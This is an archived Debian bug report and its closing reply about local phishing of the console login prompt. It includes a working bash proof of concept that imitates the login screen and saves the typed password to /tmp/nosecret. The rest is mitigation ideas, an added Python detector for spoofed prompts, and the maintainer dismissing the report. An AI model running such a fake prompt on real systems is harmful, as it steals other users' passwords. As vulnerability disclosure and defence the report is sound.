[Pkg-shadow-devel] Bug#305600: marked as done (login is vulnerable to local pishing attacks)

Debian Bug Tracking System owner@bugs.debian.org
Wed, 20 Apr 2005 23:18:19 -0700


Your message dated Thu, 21 Apr 2005 07:17:05 +0200
with message-id <20050421051705.GL7188@mykerinos.kheops.frmug.org>
and subject line [Pkg-shadow-devel] Bug#305600: login is vulnerable to local pishing attacks
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 21 Apr 2005 00:33:48 +0000
>From gps@mittelerde.physik.uni-konstanz.de Wed Apr 20 17:33:47 2005
Return-path: <gps@mittelerde.physik.uni-konstanz.de>
Received: from honk1.physik.uni-konstanz.de [134.34.140.224] 
	by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
	id 1DOPdW-0005F6-00; Wed, 20 Apr 2005 17:33:42 -0700
Received: from localhost (localhost.localnet [127.0.0.1])
	by honk1.physik.uni-konstanz.de (Postfix) with ESMTP id 6C2F92BC43
	for <submit@bugs.debian.org>; Thu, 21 Apr 2005 02:33:40 +0200 (CEST)
Received: from honk1.physik.uni-konstanz.de ([127.0.0.1])
	by localhost (honk [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
	id 08967-14 for <submit@bugs.debian.org>;
	Thu, 21 Apr 2005 02:33:36 +0200 (CEST)
Received: from gandalf.physik.uni-konstanz.de (gandalf.physik.uni-konstanz.de [134.34.140.5])
	(using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits))
	(No client certificate requested)
	by honk1.physik.uni-konstanz.de (Postfix) with ESMTP id 26F282BC39
	for <submit@bugs.debian.org>; Thu, 21 Apr 2005 02:33:36 +0200 (CEST)
Received: from bilbo.physik.uni-konstanz.de (bilbo.physik.uni-konstanz.de [134.34.140.32])
	by gandalf.physik.uni-konstanz.de (Postfix) with ESMTP id B997CC
	for <submit@bugs.debian.org>; Thu, 21 Apr 2005 02:33:35 +0200 (CEST)
Received: from gps by bilbo.physik.uni-konstanz.de with local (Exim 3.35 #1 (Debian))
	id 1DOPdP-0003Qg-00; Thu, 21 Apr 2005 02:33:35 +0200
Date: Thu, 21 Apr 2005 02:33:35 +0200
From: Gerhard Schrenk <gps@mittelerde.physik.uni-konstanz.de>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: login is vulnerable to local pishing attacks
Message-ID: <20050421003335.GA13179@bilbo>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
X-Reportbug-Version: 3.8
User-Agent: Mutt/1.5.6+20040907i
Sender: Gerhard Schrenk <gps@bilbo.physik.uni-konstanz.de>
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at honk.physik.uni-konstanz.de
Delivered-To: submit@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
	(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
	autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Package: login
Version: 1:4.0.3-30.7
Severity: important
Tags: security

Every local user can simply start a little program that imitates login and
grabs the password, pretending it's wrong. It's really hard for the average user
to spot the difference and to make sure that he really didn't mistype the
password.  Most users have no read access to /var/log/auth.log and thus cannot
check afterwards.  If the attacker crashes X so that it doesn't restart
(unreproducible but quite easy for users who have reached their quota limit...)
and disables ssh (pulling the network cable), you have a good chance of getting the
password of your local admin/root.

Proof of concept:

#!/bin/bash
# Fake login prompt.  Start it with:  exec ./scriptname
# (exec replaces the attacker's own shell, so this is what the next
#  person sitting down at the console sees.)  'read -p' is a bash
# extension, hence /bin/bash rather than /bin/sh.
trap '' INT TSTP                    # ^C and ^Z must not drop out of it
clear
echo
echo "Debian GNU/Linux 3.1 medusa tty1"
echo
read -r -p "medusa login: " user
stty -echo                          # no echo, just like the real login
read -r -p "Password: " nosecret
stty echo
echo
echo "$nosecret" > /tmp/nosecret    # the captured password
sleep 3                             # the real login also pauses on failure
echo "Login incorrect"
echo
exec login                          # hand over to the real login; the
                                    # victim assumes a typo and retries

IMHO the easiest security enhancement for password-based local
authentication seems to be (anyone have better ideas?) key sequences that can
only be caught by the kernel or by apps that are suid root.

For example one can put the line
  kb::kbrequest:fuser -KILL -ksn file /dev/tty$(fgconsole)
in /etc/inittab. Then one *can* "zap" at any time to respawn getty and
login.

In a multiuser (lab) environment it would be desirable if the admin
could enforce such a safe key sequence before getty/login starts. I have
played with 'getty -t' and/or s/respawn/once/ in /etc/inittab but have
not yet found a satisfying solution.

The best solution I found was to spawn the getty with a timeout, e.g.
  3:23:respawn:/sbin/getty -t 60 38400 tty3
and to patch the default getty (agetty.c in util-linux) with an additional
signal handler for SIGALRM. Now the user *must* first kill the timed-out getty
with the safe(?) kbrequest. Quick 'n dirty idea:

#include <signal.h>
#include <string.h>

/* On the -t timeout, stop the getty instead of letting SIGALRM kill it:
   init does not respawn a stopped child, so the console stays dead until
   the kbrequest entry above kills the stopped getty and init starts a
   fresh one. */
static void sigalrm_handler(int sig) {
  (void)sig;
  raise(SIGSTOP);            /* async-signal-safe */
}
...
struct sigaction sa;
memset(&sa, 0, sizeof sa);   /* zero sa_flags and sa_mask */
sa.sa_handler = sigalrm_handler;
sigaction (SIGALRM, &sa, NULL);

Since I don't yet know the *right* Debian default solution I am opening
this bug against login.

-- Gerhard

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.11.6-clients
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages login depends on:
ii  libc6                       2.3.2.ds1-20 GNU C Library: Shared libraries an
ii  libpam-modules              0.76-22      Pluggable Authentication Modules f
ii  libpam-runtime              0.76-22      Runtime support for the PAM librar
ii  libpam0g                    0.76-22      Pluggable Authentication Modules l

-- no debconf information

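The report above relies on the victim noticing nothing; a complementary check, added here as an example and not part of the original bug report, the shadow/login package or util-linux, is for root to verify from another session (ssh, another console) that a visible "login:" or "Password:" prompt on a virtual console is actually drawn by a privileged process. It reads the console text from /dev/vcsN and, for every process, the controlling tty, process group and the tty's foreground process group from /proc/<pid>/stat plus the effective uid from /proc/<pid>/status, and flags a prompt whose foreground process group contains no process with euid 0. The host name "medusa", the pids and uids in the sample data are constructed; the live path assumes Linux /proc and /dev/vcsN semantics and only runs when invoked as root.

```python
#!/usr/bin/env python3
"""Flag a login/password prompt on a Linux virtual console that is not
drawn by a privileged process (example code, not part of login/shadow).

A genuine "login:" or "Password:" prompt on /dev/ttyN comes from getty,
login or a setuid helper such as su/sudo, all of which run with euid 0.
The PoC in the bug report runs as the attacker, so while its prompt is on
screen the tty's foreground process group holds only unprivileged
processes.  Root can observe both facts via /dev/vcsN and /proc.
"""
import os
import re
import sys
from dataclasses import dataclass
from typing import List, Tuple

TTY_MAJOR = 4                       # /dev/ttyN device major on Linux
PROMPT_RE = re.compile(r"(login|Password):$")


@dataclass
class Proc:
    pid: int
    comm: str
    euid: int
    tty_nr: int     # controlling tty, encoded as in /proc/<pid>/stat
    pgrp: int       # process group
    tpgid: int      # foreground process group of the controlling tty


def parse_stat(line: str) -> Tuple[int, str, int, int, int]:
    """Return (pid, comm, pgrp, tty_nr, tpgid) from a /proc/<pid>/stat line.

    comm is in parentheses and may itself contain spaces or ')', so the
    line is split at the LAST ')' rather than on whitespace."""
    lpar, rpar = line.index("("), line.rindex(")")
    pid, comm = int(line[:lpar]), line[lpar + 1:rpar]
    f = line[rpar + 1:].split()
    # f[0]=state f[1]=ppid f[2]=pgrp f[3]=session f[4]=tty_nr f[5]=tpgid
    return pid, comm, int(f[2]), int(f[4]), int(f[5])


def on_tty(p: Proc, minor: int) -> bool:
    return os.major(p.tty_nr) == TTY_MAJOR and os.minor(p.tty_nr) == minor


def prompt_visible(screen: str) -> bool:
    """screen is the raw text of /dev/vcsN: fixed-width rows, no newlines,
    padded with spaces, so a prompt is the last non-blank text."""
    return PROMPT_RE.search(screen.rstrip()) is not None


def spoofed_prompt(screen: str, procs: List[Proc], minor: int) -> List[Proc]:
    """Return the processes drawing a fake prompt on /dev/tty<minor>, or []
    if no prompt is shown or a root process is in the foreground group."""
    if not prompt_visible(screen):
        return []
    here = [p for p in procs if on_tty(p, minor)]
    if not here:
        return []
    fg = here[0].tpgid          # identical for every process on this tty
    fg_procs = [p for p in here if p.pgrp == fg]
    if fg_procs and all(p.euid != 0 for p in fg_procs):
        return fg_procs
    return []


def read_live(minor: int) -> Tuple[str, List[Proc]]:
    """Snapshot /dev/vcsN and /proc on a real system (needs root)."""
    with open(f"/dev/vcs{minor}", "rb") as fh:
        screen = fh.read().decode("latin-1")
    procs = []
    for d in os.listdir("/proc"):
        if not d.isdigit():
            continue
        try:
            with open(f"/proc/{d}/stat") as fh:
                pid, comm, pgrp, tty_nr, tpgid = parse_stat(fh.read())
            with open(f"/proc/{d}/status") as fh:
                uid = next(l for l in fh if l.startswith("Uid:")).split()
        except (OSError, StopIteration):
            continue            # process vanished while we looked
        # Uid: real effective saved fs -> uid[2] is the effective uid
        procs.append(Proc(pid, comm, int(uid[2]), tty_nr, pgrp, tpgid))
    return screen, procs


# Constructed sample: the PoC script (pid 900, euid 1000) has replaced the
# attacker's shell on tty1; its parent login (pid 812) still runs as root.
TTY1 = os.makedev(TTY_MAJOR, 1)
SAMPLE_SCREEN = ("Debian GNU/Linux 3.1 medusa tty1".ljust(80) + " " * 80
                 + "medusa login: ".ljust(80) + " " * 80 * 22)
SAMPLE_PROCS = [Proc(812, "login", 0, TTY1, 812, 900),
                Proc(900, "sh", 1000, TTY1, 900, 900)]


def demo() -> List[Proc]:
    return spoofed_prompt(SAMPLE_SCREEN, SAMPLE_PROCS, 1)


if __name__ == "__main__":
    minor = int(sys.argv[1]) if len(sys.argv) > 1 else 1
    if os.geteuid() == 0 and os.path.exists(f"/dev/vcs{minor}"):
        screen, procs = read_live(minor)
    else:                       # not root: run against the constructed sample
        screen, procs = SAMPLE_SCREEN, SAMPLE_PROCS
    bad = spoofed_prompt(screen, procs, minor)
    for p in bad:
        print(f"tty{minor}: prompt drawn by pid {p.pid} ({p.comm}) euid {p.euid}")
    sys.exit(1 if bad else 0)
```

Two design points: the test is on the effective uid and on the whole foreground process group, so a legitimate su or sudo prompt (setuid, euid 0) or a pipeline that contains one is not flagged, while the PoC's plain sh is. This is a detective control only: it runs from another session, after the fact, and races the attacker's `exec login`; the kbrequest or SAK-style key sequence the report asks for remains the preventive fix.
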
---------------------------------------
Received: (at 305600-done) by bugs.debian.org; 21 Apr 2005 06:14:18 +0000
>From bubulle@kheops.frmug.org Wed Apr 20 23:14:18 2005
Return-path: <bubulle@kheops.frmug.org>
Received: from onera.onera.fr [144.204.65.4] 
	by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
	id 1DOUx7-0001iW-00; Wed, 20 Apr 2005 23:14:17 -0700
Received: from cc-mykerinos.onera (localhost [127.0.0.1])
        by onera.onera.fr  with ESMTP id j3L6ECrI027455;
        Thu, 21 Apr 2005 08:14:15 +0200 (MEST)
Received: by mykerinos.kheops.frmug.org (Postfix, from userid 7426)
	id CF3592329B; Thu, 21 Apr 2005 07:17:05 +0200 (CEST)
Date: Thu, 21 Apr 2005 07:17:05 +0200
From: Christian Perrier <bubulle@debian.org>
To: Gerhard Schrenk <gps@mittelerde.physik.uni-konstanz.de>,
        305600-done@bugs.debian.org
Cc: team@security.debian.org
Subject: Re: [Pkg-shadow-devel] Bug#305600: login is vulnerable to local pishing attacks
Message-ID: <20050421051705.GL7188@mykerinos.kheops.frmug.org>
References: <20050421003335.GA13179@bilbo>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20050421003335.GA13179@bilbo>
User-Agent: Mutt/1.5.9i
Delivered-To: 305600-done@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
	(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
	autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Quoting Gerhard Schrenk (gps@mittelerde.physik.uni-konstanz.de):
> Package: login
> Version: 1:4.0.3-30.7
> Severity: important
> Tags: security
> 
> Every local user can simply start a little program that imitates login and


Well, as Tomasz (shadow upstream author) mentioned, this can be said
about any program which prompts users for a password.

And I would add that, if your system allows random users to replace
login with such a program, then you have many other problems than
phishing.

So, really sorry, but I absolutely don't see what the shadow package
maintainers can do with this bug report, except closing it.

My understanding of Matt's answer, in the name of the Debian security
team, is that the only way to try to avoid this is a special call in
the system for "secured input" or whatever you want to name it, which
could then be used by programs needing it. But, well, in such cases,
what would prevent the people who can replace login because they
compromised a system from writing their own such program using these
calls?

This is a non-issue, sorry.